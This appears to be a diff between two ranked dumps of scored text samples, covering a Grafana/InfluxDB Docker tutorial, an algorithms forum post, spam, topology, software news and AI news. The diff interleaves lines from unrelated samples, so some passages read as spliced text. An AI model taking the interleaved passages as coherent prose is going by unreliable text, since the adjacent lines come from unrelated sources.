and analytics. Using InfluxDB, you can easily store system and application performance data and manage any time series data. - -Grafana : Grafana is an open-source, general purpose dashboard that is used for visualizing time series data for Internet infrastructure and application analytics. Grafana supports graphite, influxdb or opentsdb as backends and runs as a web application. - -In this tutorial, we will learn how to create and run Grafana and InfluxDB Docker containers in Ubuntu 14.04. - -Requirements - -A server running Ubuntu-14.04 with Docker installed. - -A non-root user with sudo privileges setup on server. - -Creating The Dockerfile +Rank = 38; Score = 2392064.0 +<|begin_of_text|>$\begingroup$ -First, you will need to create the Docker file to install all requisite software. Create docker file inside your home directory using the following command: +maybe all the major/preferred algorithms of interest to this audience have been mentioned at this point. however, a few more deserve mention for completeness. & some analysis of what is considered a significant algorithm is relevant here. -sudo nano Dockerfile +in CS & IT fields there seems to be a phenomenon noticed long ago in AI called "moving the goalposts". this is a psychological phenomenon where the field advances relatively quickly but people quickly mentally adjust to "the new normal" and take real or even breakthrough advances as mundane or unremarkable in retrospect, after accomplished, ie downplayed or minimized. this is highly captured in this question in the way that algorithms move from R&D into "deployment". quoting the author of the question in later comments: -Add the following lines with all requisite software: +In fact, a negligible fraction of all the code that gets written is implementing anything that is interesting from an algorithmic point of view. -FROM ubuntu MAINTAINER Hitesh Jethva (hitjethva@gmail.com) RUN apt-get update && apt-get -y --no-install-recommends install ca-certificates software-properties-common python-django-tagging python-simplejson python-memcache python-ldap python-cairo python-pysqlite2 python-support python-pip gunicorn supervisor nginx-light nodejs git curl openjdk-7-jre build-essential python-dev +but this is problematic and basically a TCS-centric redefinition of the word "algorithm". presumably the interesting algorithms are advanced. does that mean that if a problem is reduced to an advanced algorithm, its no longer "interesting"? and "advanced" is clearly a moving target. so there is a way to define "algorithms" narrowly, or broadly. it seems the TCS definition changes on context, but note even in TCS, there is a trend toward the broad definition eg in the so-called "algorithmic lens". -Add the following lines to install Grafana, InfluxDB, and do some basic configuration: +sometimes the most ubiquitous algorithms are also the most overlooked! the internet and WWW is a large environment/near-ecology for algorithms. still relatively young at only about 2 decades old (invented ~1991) it has grown massively and exponentially in a short amount of time. WWW site growth has probably even outpaced the famous exponential Moores law. -WORKDIR /opt RUN curl -s -o /opt/grafana-1.8.1.tar.gz http://grafanarel.s3.amazonaws.com/grafana-1.8.1.tar.gz && curl -s -o /opt/influxdb_latest_amd64.deb http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb && mkdir /opt/grafana && tar -xzvf grafana-1.8.1.tar.gz --directory /opt/grafana --strip-components=1 && dpkg -i influxdb_latest_amd64.deb && echo "influxdb soft nofile unlimited" >> /etc/security/limits.conf && echo "influxdb hard nofile unlimited" >> /etc/security/limits.conf +the internet/WWW are supported by many sophisticated algorithms. the internet has complex routing algorithms built into routers (again powering multi-billion-dollar corporations such as Cisco). some advanced theory is applicable there eg in routing algorithms. these algorithms were a subject of emerging, advanced/cutting edge research decades ago however a now so finetuned & well understood that its somewhat invisible. -Next, copy some configuration files: +we should not so soon forget that decades ago, leading researchers were not even sure if the internet world work or was possible (seen in early packet switching research, a radical new design pattern at the time departing from the prior circuit-switching), and even a few years ago there were fears that it would fail to scale at some point and begin to fail due to overwhelming spikes in volume. -ADD config.js /opt/grafana/config.js ADD nginx.conf /etc/nginx/nginx.conf ADD supervisord.conf /etc/supervisor/conf.d/superv +it also uses sophisticated error detection/correction. ================================================================================ -Rank = 39; Score = 4046848.0 -<|begin_of_text|>Find yourself writing a good bit of Markdown? Wish there was a better editor? Maybe in the new shiny and cool code editor, VS Code? - -Dave Johnson has written up a great tutorial on just that! - -Today we’re going to build an amazing Markdown editor using Visual Studio Code and Pandoc. This system will include real-time Markdown linting and the ability to generate html, docx, and pdf documents quickly with the potential to produce many other document formats as well. - -Markdown is a simple markup language that allows one to write documents using a text editor and transform those documents into many different formats. Among other things, it works beautifully for documenting source code since the Markdown documents can be checked in and versioned with Git or your source control system of choice. - -Pandoc is a highly capable “Swiss army knife” tool for converting documents between various formats. It is not limited to Markdown as an input (source) format, but it is used extensively in this context. - -Finally, Visual Studio Code is a solid, lightweight code editor created by Microsoft. It is based on the Electron framework, which facilitates the development of desktop GUI applications using the Node.js framework. I’m a huge fan of VS Code, and have written previous articles about it including the... - -Let’s get started! - -Install Visual Studio Code... - -Familiarize yourself with VS Code out-of-the-box Markdown features... - -Try Markdown previewer... - -Markdown Snippets... - -Install Markdown linter... - -Test drive Markdown linting... - -Install Pandoc Extension... - -Create configuration files to make a great Markdown editor... - -Create settings.json file... - -Create Markdown lint configuration file... +Rank = 39; Score = 2260992.0 +<|begin_of_text|>Renting Dumpsters Posted on December 5, 2018 | By STEVE Whenever people have a task, it is easy to generate waste and piling up garbage can be a main source of worry. This is not only with regards to taking up space but also in conditions of polluting the environment unnecessarily. Therefore, how perform these worries are taken by you aside? This can be done by opting to use 20 yard dumpsters philadelphia simply. These are offered by local rental businesses and are designed to alleviate the worries of coping with trash from your brain. There are many of these rental companies in the marketplace and as such, it ought not to be difficult so that you can get the same. The local rental businesses will make sure that you recycle your waste in an eco-friendly method and at the same period, make the process easy. By using these eco-friendly dumpsters, you not really just ensure that your encircling is clean and gives you the ideal life-style but it will also make sure that you enjoy great wellness. As a result, this will give you great endurance and boost your probabilities of taking pleasure in a treatment free of charge way of living. These can be utilized in different fronts and places such as churches, house owners, areas and additional businesses. For this good reason, they are known to provide all round services to all these combined groups. There are instances when you might have dangerous waste products and this provides the ideal chance that you can ensure that you get rid of the same in a secure way. Dumpsters may end up being availed in various designs seeing that good as sizes and this makes it all easy for individuals to help to make buys based on their requirements. Another main benefit connected with this type of waste materials disposal is usually the truth that the consumer can place it in an area of their choice. This makes it simple to make sure that the clean up process is simple and effective on your part as well. It is normally essential to take note that the rental companies are also accountable for making sure that they are eliminated from your property once you are completed using the same and they can adhere to your time routine. What is more, in many situations, these ongoing companies will adhere to certain safety procedures when they are putting the same on site. At this true point, it is important to note that dumpsters that are provided by professional local rental businesses are also the perfect way to eliminate waste that is produced on building sites whether it is green backyard, commercial or home keep waste. What is usually even more, this provides you +================================================================================ +Rank = 40; Score = 2228224.0 +<|begin_of_text|>Let be a natural number. A basic operation in the topology of oriented, connected, compact, -dimensional manifolds (hereby referred to simply as manifolds for short) is that of connected sum: given two manifolds, the connected sum is formed by removing a small ball from each manifold and then gluing the boundary together (in the orientation-preserving manner). This gives another oriented, connected, compact manifold, and the exact nature of the balls removed and their gluing is not relevant for topological purposes (any two such procedures give homeomorphic manifolds). It is easy to see that this operation is associative and commutative up to homeomorphism, thus and, where we use to denote the assertion that is homeomorphic to. -Create CSS file to be used by HTML generated by Pandoc... +(It is important that the orientation is preserved; if, for instance,, and is a chiral 3-manifold which is chiral (thus, where is the orientation reversal of ), then the connect sum of with itself is also chiral (by the prime decomposition; in fact one does not even need the irreducibility hypothesis for this claim), but is not. A typical example of an irreducible chiral manifold is the complement of a trefoil knot. Thanks to Danny Calegari for this example.) -Create an HTML Document with Pandoc... +The -dimensional sphere is an identity (up to homeomorphism) of connect sum: for any. A basic result in the subject is that the sphere is itself irreducible: -Conclusion +Theorem 1 (Irreducibility of the sphere) If, then. -You have now created an awesome Markdown editor/environment that you can use for all of your documentation needs! Pandoc provides a number of other conversion options that you can either add in the VS Code configuration or run from the command line to produce other document formats, create books, etc. You now have an amazing Markdown editor. Go have fun with it! +For (curves), this theorem is trivial because the only connected -manifolds are homeomorphic to circles. For (surfaces), the theorem is also easy by considering the genus of. For the result follows from the prime decomposition. But for higher, these ad hoc methods no longer work. Nevertheless, there is an elegant proof of Theorem 1, due to Mazur, and known as Mazur’s swindle. The reason for this name should become clear when one sees the proof, which I reproduce below. -Follow Dave Johnson @thisDaveJ on Twitter to stay up to date on the latest tutorials and tech articles. +Suppose. Now consider the infinite connected sum -... [Click through to read the entire post]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +This is an infinite connected sum of spheres, and can thus be viewed as a half-open cylinder, which is topologically equivalent to a sphere with a small ball removed; alternatively, one can contract the boundary at infinity to a point to recover the sphere. On the other hand, by using the associativity of connected sum (which will still work for the infinite connected sum, if one thinks about it carefully ================================================================================ -Rank = 40; Score = 3997696.0 +Rank = 41; Score = 2195456.0 <|begin_of_text|>Warren Berger believes questions are more important than answers. A best-selling author and self-proclaimed “questionologist,” Warren is on a mission to help all leaders learn how to use questioning to support innovative, resilient and adaptive organizations. We caught up with Warren recently to ask him about why it’s more important than ever to lean into questioning and curiosity. @@ -1032,136 +1007,93 @@ LKS: Are you seeing technology change the type of questions we should be asking? WB: Technology has thrown everything open to question because everything we thought we knew how to do can now be done differently. The shoe-ret ================================================================================ -Rank = 41; Score = 3915776.0 -<|begin_of_text|>Researchers at North Carolina State University have developed techniques that can be used to create ideal geometric phase holograms for any kind of optical pattern -- a significant advance over the limitations of previous techniques. The holograms can be used to create new types of displays, imaging systems, telecommunications technology and astronomical instruments. +Rank = 42; Score = 2179072.0 +<|begin_of_text|>Inkscape just released version 0.91 of their Open Source vector graphics editor, and the new package will soon be available in the stable repositories for Fedora 21. Inkscape 0.91 is the first major release of Inkscape for a few years, and it has many bugfixes and new features compared to the previous Inkscape 0.48 release. -A geometric phase hologram is a thin film that manipulates light. Light moves as a wave, with peaks and troughs. When the light passes through a geometric phase hologram, the relationship between those peaks and troughs is changed. By controlling those changes, the hologram can focus, disperse, reorient or otherwise modify the light. +For those not familiar with Inkscape, It is a versatile, feature rich vector graphics editor that can be used for a wide range of tasks, including UI mockups, icons, logos, digital illustration: -An ideal geometric phase hologram modifies the light very efficiently, meaning that little of the light is wasted. But ideal geometric phase holograms can also produce three different, well-defined "wavefronts" -- or transformed versions of the light that passes through the thin film. +Inkscape uses the Scalable Vector Graphics (SVG) format as the primary source filetype, which is getting more and more popular as a format for vector graphics on the web. Inkscape can also export to a wide range of different formats, including PNG and PDF. -"We can direct light into any one or more of those three wavefronts, which allows us to use a single ideal geometric phase hologram in many different ways," says Michael Escuti, a professor of electrical and computer engineering at NC State and corresponding author of a paper on the work. +Inkscape 0.91 is a huge improvement over the previous 0.48 release, with the inkscape developers fixing hundreds of bugs, introducing a wide range of new tools and features, and also making Inkscape perform much, much better. -Previously, researchers were only able to make ideal geometric phase holograms in a limited set of simple patterns, curtailing their usefulness for new applications. This is because making these holograms involves orienting molecules or structures at a scale smaller than the wavelength of light. +Stability and Performance -"We've come up with two ways of making ideal geometric phase holograms that are relatively simple but allow us to control the orientation of the molecules that ultimately manipulate the light," Escuti says. +The Inkscape developers did a lot of work in this release to improve the performance and stability of Inkscape. I have been using development versions of Inkscape 0.91 for over a year now, and noticed a huge reduction in the number of times Inkscape stalled or crashed during use. -First, the researchers use lasers to create a high-fidelity light pattern, either by taking advantage of how waves of light interfere with each other, or by using a tightly focused laser to scan through a pattern -- much like a laser printer. +Additionally, Inkscape 0.91 includes a new renderer based on Cairo, which is noticeably faster at rendering complex drawings with lots of SVG filters like blurs, and also caches parts of complex drawings to improve rendering times when editing. -A photoreactive substrate records the light pattern, with each molecule in the substrate orienting itself depending on the polarization of the light it was exposed to. To understand this, think of a beam of light as a wavy string, traveling from left to right. That string is also vibrating up and down -- creating wiggles are that are perpendicular to the direction the string is traveling. Controlling the orientation angle of the light's linear polarization just means controlling the direction that the wave is wiggling. +Inkscape now uses threading when rendering filter effects, so users with newer machines with multiple processing cores will notice a difference when rendering complex images. Inkscape also now uses up to 25% less memory on some complex drawings. -The pattern that is recorded on the substrate then serves as a template for a liquid crystal layer that forms the finished hologram. +New Features -"Using these techniques, -================================================================================ -Rank = 42; Score = 3883008.0 -<|begin_of_text|>$\begingroup$ +Inkscape 0.91 delivers a wide range of features that improve and simplify drawing and illustrating in Inkscape. -maybe all the major/preferred algorithms of interest to this audience have been mentioned at this point. however, a few more deserve mention for completeness. & some analysis of what is considered a significant algorithm is relevant here. +New measurement tool -in CS & IT fields there seems to be a phenomenon noticed long ago in AI called "moving the goalposts". this is a psychological phenomenon where the field advances relatively quickly but people quickly mentally adjust to "the new normal" and take real or even breakthrough advances as mundane or unremarkable in retrospect, after accomplished, ie downplayed or minimized. this is highly captured in this question in the way that algorithms move from R&D into "deployment". quoting the author of the question in later comments: +0.91 introduces a new tool that allows users to measure the distances and angles between objects in an inkscape drawing by drawing a “ruler” over the objects. Using this tool is super simple, just draw a live over your objects, and the distances and angles will live-update on canvas as you move your mouse -In fact, a negligible fraction of all the code that gets written is implementing anything that is interesting from an algorithmic point of view. +Font and Text Improvements -but this is problematic and basically a TCS-centric redefinition of the word "algorithm". presumably the interesting algorithms are advanced. does that mean that if a problem is reduced to an advanced algorithm, its no longer "interesting"? and "advanced" is clearly a moving target. so there is a way to define "algorithms" narrowly, or broadly. it seems the TCS definition changes on context, but note even in TCS, there is a trend toward the broad definition eg in the so-called "algorithmic lens". +The inkscape developers did a lot of work in the 0. +================================================================================ +Rank = 43; Score = 2162688.0 +<|begin_of_text|>💪 From the big boys -sometimes the most ubiquitous algorithms are also the most overlooked! the internet and WWW is a large environment/near-ecology for algorithms. still relatively young at only about 2 decades old (invented ~1991) it has grown massively and exponentially in a short amount of time. WWW site growth has probably even outpaced the famous exponential Moores law. +Backchannel run a rare piece on how Apple uses machine learning. It states that a 200mb software package runs on the iPhone encompassing “app usage data, interactions with contacts, neural net processing, a speech modeler and a natural language event modeling system”. I’ve held the view for a while now that today’s AI techniques and infrastructure will re-open a class of historically intractable problems while also enabling us to rethink how products and features should be designed. Apple seem to think the same: “Machine learning is enabling us to say yes to some things that in past years we would have said no to. It’s becoming embedded in the process of deciding the products we’re going to do next.” -the internet/WWW are supported by many sophisticated algorithms. the internet has complex routing algorithms built into routers (again powering multi-billion-dollar corporations such as Cisco). some advanced theory is applicable there eg in routing algorithms. these algorithms were a subject of emerging, advanced/cutting edge research decades ago however a now so finetuned & well understood that its somewhat invisible. +, modestly called -we should not so soon forget that decades ago, leading researchers were not even sure if the internet world work or was possible (seen in early packet switching research, a radical new design pattern at the time departing from the prior circuit-switching), and even a few years ago there were fears that it would fail to scale at some point and begin to fail due to overwhelming spikes in volume. +Salesforce announced their internal umbrella AI initiative, modestly called Einstein, which will go on to power many of the company’s cloud services, as well as expose AI tools to end users. The team of 175 data scientists includes talent from acquired startups MetaMind, PredictionIO and RelateIQ. The company’s flagship event, Dreamforce, will attract 170k people into SF next week. -it also uses sophisticated error detection/correction. -================================================================================ -Rank = 43; Score = 3768320.0 -<|begin_of_text|>Renting Dumpsters Posted on December 5, 2018 | By STEVE Whenever people have a task, it is easy to generate waste and piling up garbage can be a main source of worry. This is not only with regards to taking up space but also in conditions of polluting the environment unnecessarily. Therefore, how perform these worries are taken by you aside? This can be done by opting to use 20 yard dumpsters philadelphia simply. These are offered by local rental businesses and are designed to alleviate the worries of coping with trash from your brain. There are many of these rental companies in the marketplace and as such, it ought not to be difficult so that you can get the same. The local rental businesses will make sure that you recycle your waste in an eco-friendly method and at the same period, make the process easy. By using these eco-friendly dumpsters, you not really just ensure that your encircling is clean and gives you the ideal life-style but it will also make sure that you enjoy great wellness. As a result, this will give you great endurance and boost your probabilities of taking pleasure in a treatment free of charge way of living. These can be utilized in different fronts and places such as churches, house owners, areas and additional businesses. For this good reason, they are known to provide all round services to all these combined groups. There are instances when you might have dangerous waste products and this provides the ideal chance that you can ensure that you get rid of the same in a secure way. Dumpsters may end up being availed in various designs seeing that good as sizes and this makes it all easy for individuals to help to make buys based on their requirements. Another main benefit connected with this type of waste materials disposal is usually the truth that the consumer can place it in an area of their choice. This makes it simple to make sure that the clean up process is simple and effective on your part as well. It is normally essential to take note that the rental companies are also accountable for making sure that they are eliminated from your property once you are completed using the same and they can adhere to your time routine. What is more, in many situations, these ongoing companies will adhere to certain safety procedures when they are putting the same on site. At this true point, it is important to note that dumpsters that are provided by professional local rental businesses are also the perfect way to eliminate waste that is produced on building sites whether it is green backyard, commercial or home keep waste. What is usually even more, this provides you -================================================================================ -Rank = 44; Score = 3751936.0 -<|begin_of_text|>Image caption The NSA wants to use its quantum computer to break encryption used to protect online communication +Six of the most powerful technology companies have set up the have set up the Partnership on AI as a non-profit aimed at advancing public understanding of AI and formulate best practices on the challenges and opportunities within the field. An important catalyst to this end will undoubtedly be the continuation of open source technology development, which Seldon’s founder articulates in this piece. -The US National Security Agency is building a quantum computer to break the encryption that keeps messages secure, reports the Washington Post. +🌎 On the importance and impact of AI on the World -The NSA project came to light in documents passed to the newspaper by whistle-blower Edward Snowden. - -The spying agency hopes to harness the special qualities of quantum computers to speed up its code-cracking efforts. - -The NSA is believed to have spent about $80m (£49m) on the project but it has yet to produce a working machine. - -If the NSA managed to develop a working quantum computer it would be put to work breaking encryption systems used online and by foreign governments to keep official messages secure, suggest the documents excerpted in the Post. - -The quantum computer is being developed under a research programme called Penetrating Hard Targets and is believed to be conducted out of a lab in Maryland. +Stanford’s 100 year study on AI published their first report. It finds “no cause for concern that AI is an imminent threat to humankind. No machines with self-sustaining long-term goals and intent have been developed, nor are they likely to be developed in the near future”. From a public policy perspective, it recommends to: -Processing power +Define a path toward accruing technical expertise in AI at all levels of government. -Many research groups around the world are pursuing the goal of creating a working quantum computer but those developed so far have not been able to run the algorithms required to break contemporary encryption systems. +Remove the perceived and actual impediments to research on the fairness, security, privacy, and social impacts of AI systems. -Current computers attempt to crack encryption via many different means but they are limited to generating possible keys to unscramble data one at a time. Using big computers can speed this up but the huge numbers used as keys to lock away data limits the usefulness of this approach. +Increase public and private funding for interdisciplinary studies of the societal impacts of AI. -By contrast, quantum computers exploit properties of matter that, under certain conditions, mean the machine can carry out lots and lots of calculations simultaneously. This makes it practical to try all the possible keys protecting a particular message or stream of data. +a16z’s Chris Dixon sets out 11 reasons to be excited about the future of technology with short soundbites for each. Five of these are either directly related to or will be enabled by AI and machine learning. -The hard part of creating a working quantum computer is keeping enough of its constituent computational elements, called qubits, stable so they can interact and be put to useful work. +👍 User-friendly AI -The NSA is not believed to have made significant breakthroughs in its work that would put it ahead of research efforts elsewhere in the US and Europe. However, the documents passed to the Post by Edward Snowden suggest the agency's researchers are having some success developing the basic building blocks for the machine.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +UC Berkeley announced a new Center for Human-Compatible AI to study how AI used for mission ================================================================================ -Rank = 45; Score = 3702784.0 -<|begin_of_text|>PYNQ is an open-source project that makes it easy for you to design embedded systems using the Xilinx Zynq-7000 SoC using the Python language, associated libraries, and the Jupyter Notebook, which is a pretty nice, collaborative learning and development environment for many programming languages including Python. PYNQ allows you to exploit the benefits of programmable logic used together with microprocessors to build more capable embedded systems with superior performance when performing embedded tasks such as: - -High frame-rate video processing - -Hardware-accelerated algorithms - -Real-time signal processing - -High-bandwidth I/O - -Low-latency control - -Nearly every embedded system needs to run one or more such tasks. The programmable hardware on the Zynq SoC just makes this job a lot easier. - -The PYNQ-Z1 based on the Xilinx Zynq Z-7020 SoC is the first dev board to support PYNQ and it just showed up on the Digilent Web site, listing for $229. (Digilent’s academic price for the PYNQ-Z1 is only $65!) - -Digilent PYNQ-Z1 Dev Board - -Here’s what’s on the PYNQ-Z1 board: - -Xilinx Zynq Z-7020 SoC with a dual-core ARM Cortex-A9 MPCore processor running at 650MHz - -512Mbytes of DDR3 SDRAM running at 1050MHz - -16Mbytes of Quad-SPI Flash memory - -A MicroSD slot for the PYNQ environment - -USB OTG host port - -USB programming port - -Gigabit Ethernet port - -Microphone +Rank = 44; Score = 2146304.0 +<|begin_of_text|>Energy lab team explores new ways of analyzing social media -Mono audio output jack +A team at the Energy Department’s Pacific Northwest National Laboratory is creating an analysis tool that makes spotting trends in social media faster and easier. -HDMI input port +The tool, called SALSA, for SociAL Sensor Analytics, takes an automated approach that can sort through billions of tweets or other posts in seconds, identifying patterns and finding key bits of information that could be useful in emergency response, public health and other areas, according to PNNL. -HDMI output port +SALSA draws on the computing power of PNNL’s 600-node, 162-Teraflop Olympus supercomputing cluster, so the processing power is there. The challenge was finding a way to dig useful information out from all the banter on a platform that also has a non-traditional lexicon. -Two Digilent PMOD ports +“The task we all face is separating out the trivia, the useless information we all are blasted with every day, from the really good stuff that helps us live better lives,” Court Corley, a PNNL data scientist who’s leading the research, said in PNNL’s report. “There's a lot of noise, but there's some very valuable information too." -Arduino-format header for Arduino shields +Corley said the reach of social media creates value in analyzing posts to various platforms. "The world is equipped with human sensors — more than 7 billion and counting,” he said. “It's by far the most extensive sensor network on the planet. What can we learn by paying attention?" -Pushbuttons, switches, and LEDs +Agencies have employed systems to monitor social media, such as the U.S. Geological Survey’s Twitter Earthquake Detector (TED). The system was created in 2009 because Twitter often spreads the word about earthquakes and other disasters faster than traditional sensor methods. But one reason TED works is that USGS taps into Twitter’s API to search for a known keyword — “earthquake.” Taking a deeper dive into analyzing social media is more of a challenge. -That’s a lot of board for $229—and it’s pink! +The Library of Congress has run into that difficulty with its Twitter archive. LOC has collected hundreds of billions of tweets for use in research, but found that available tools for sifting through the archive are inadequate. Searches take too much time (just searching the 20 billion tweets in its initial collection would take 24 hours), and as a result LOC was turning down requests from researchers to explore the archive. -Here’s what PYNQ is, really: It’s for software developers and students who want to take advantage of the improved embedded performance made possible by the Zynq SoC’s programmable hardware without having to use ASIC-style (HDL) design tools to design hardware. +And the amount of social media-generated data is only going to grow. PNNL points out that, as of mid-2012, information posted to social media outlets each hour included an average of 30 million comments, +================================================================================ +Rank = 45; Score = 2129920.0 +<|begin_of_text|>Eigenfaces is the name given to a set of eigenvectors when they are used in the computer vision problem of human face recognition.[1] The approach of using eigenfaces for recognition was developed by Sirovich and Kirby (1987) and used by Matthew Turk and Alex Pentland in face classification.[2] The eigenvectors are derived from the covariance matrix of the probability distribution over the high-dimensional vector space of face images. The eigenfaces themselves form a basis set of all images used to construct the covariance matrix. This produces dimension reduction by allowing the smaller set of basis images to represent the original training images. Classification can be achieved by comparing how faces are represented by the basis set. -For even better performance, you can also program the PYNQ-Z1 with C or C++ using the Xilinx SDK software development environment, available in the no-cost Xilinx Vivado HL Design Suite WebPACK. +History [ edit ] -The PYNQ-Z1 and the PYNQ project make it possible to create a lot of really interesting systems, so just what are you waiting for? +The eigenface approach began with a search for a low-dimensional representation of face images. Sirovich and Kirby (1987) showed that principal component analysis could be used on a collection of face images to form a set of basis features. These basis images, known as eigenpictures, could be linearly combined to reconstruct images in the original training set. If the training set consists of M images, principal component analysis could form a basis set of N images, where N < M. The reconstruction error is reduced by increasing the number of eigenpictures, however the number needed is always chosen less than M. For example, if you need to generate a number of N eigenfaces for a training set of M face images, you can say that each face image can be made up of "proportions" of all this K "features" or eigenfaces : Face image 1 = (23% of E 1 ) + (2% of E 2 ) + (51% of E 3 ) +... + (1% E n ). +In 1991 M. Turk and A. Pentland expanded these results and presented the eigenface method of face recognition.[3] In addition to designing a system for automated face recognition using eigenfaces, they showed a way of calculating the eigenvectors of a covariance matrix in such a way as to make it possible for computers at that time to perform eigen-decomposition on a large number of face images. Face images usually occupy a high-dimensional space and conventional principal component analysis was intractable on such data sets. Turk and Pentland's paper demonstrated ways to extract the eigenvectors based on matrices sized by the number of images rather than the number of pixels. +Once established, the eigenface method was expanded to include methods of preprocessing to improve accuracy.[4 ================================================================================ -Rank = 46; Score = 3702784.0 +Rank = 46; Score = 2072576.0 <|begin_of_text|>BY: Follow @LizWFB Researchers at the National Institutes of Health (NIH) have developed a system that can predict the "psychological status" of users with smartphones and hope to private companies to bring the invention to the market. @@ -1182,53 +1114,68 @@ The NIH said the app is currently being used for drug addiction interventions, b Request for comment from the NIH was not returned by press time.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 47; Score = 3653632.0 -<|begin_of_text|>Inkscape just released version 0.91 of their Open Source vector graphics editor, and the new package will soon be available in the stable repositories for Fedora 21. Inkscape 0.91 is the first major release of Inkscape for a few years, and it has many bugfixes and new features compared to the previous Inkscape 0.48 release. +Rank = 47; Score = 2072576.0 +<|begin_of_text|>We live in a world of pain and suffering. There is no one who is not affected by the harsh realities of life, and the question “why do bad things happen to good people?” is one of the most difficult questions in all of theology. God is sovereign, so all that happens must have at least been allowed by Him, if not directly caused by Him. At the outset, we must acknowledge that human beings, who are not eternal, infinite, or omniscient, cannot expect to fully understand God’s purposes and ways.The book of Job deals with the issue of why God allows bad things to happen to good people. Job was a righteous man (Job 1:1), yet he suffered in ways that are almost beyond belief. God allowed Satan to do everything he wanted to Job except kill him, and Satan did his worst. What was Job’s reaction? “Though he slay me, yet will I hope in him” (Job 13:15). “The LORD gave and the LORD has taken away; may the name of the LORD be praised” (Job 1:21). Job did not understand why God had allowed the things He did, but he knew God was good and therefore continued to trust in Him. Ultimately, that should be our reaction as well.Why do bad things happen to good people? As hard as it is to acknowledge, we must remember that there are no “good” people, in the absolute sense of the word. All of us are tainted by and infected with sin (Ecclesiastes 7:20; Romans 3:23; 1 John 1:8). As Jesus said, “No one is good—except God alone” (Luke 18:19). All of us feel the effects of sin in one way or another. Sometimes it’s our own personal sin; other times, it’s the sins of others. We live in a fallen world, and we experience the effects of the fall. One of those effects is injustice and seemingly senseless suffering.When wondering why God would allow bad things to happen to good people, it’s also good to consider these four things about the bad things that happen:1) Bad things may happen to good people in this world, but this world is not the end. Christians have an eternal perspective: “We do not lose heart. Though outwardly we are wasting away, yet inwardly we are being renewed day by day. For our light and momentary troubles are achieving for us an eternal glory that far +================================================================================ +Rank = 48; Score = 2064384.0 +<|begin_of_text|>Find yourself writing a good bit of Markdown? Wish there was a better editor? Maybe in the new shiny and cool code editor, VS Code? -For those not familiar with Inkscape, It is a versatile, feature rich vector graphics editor that can be used for a wide range of tasks, including UI mockups, icons, logos, digital illustration: +Dave Johnson has written up a great tutorial on just that! -Inkscape uses the Scalable Vector Graphics (SVG) format as 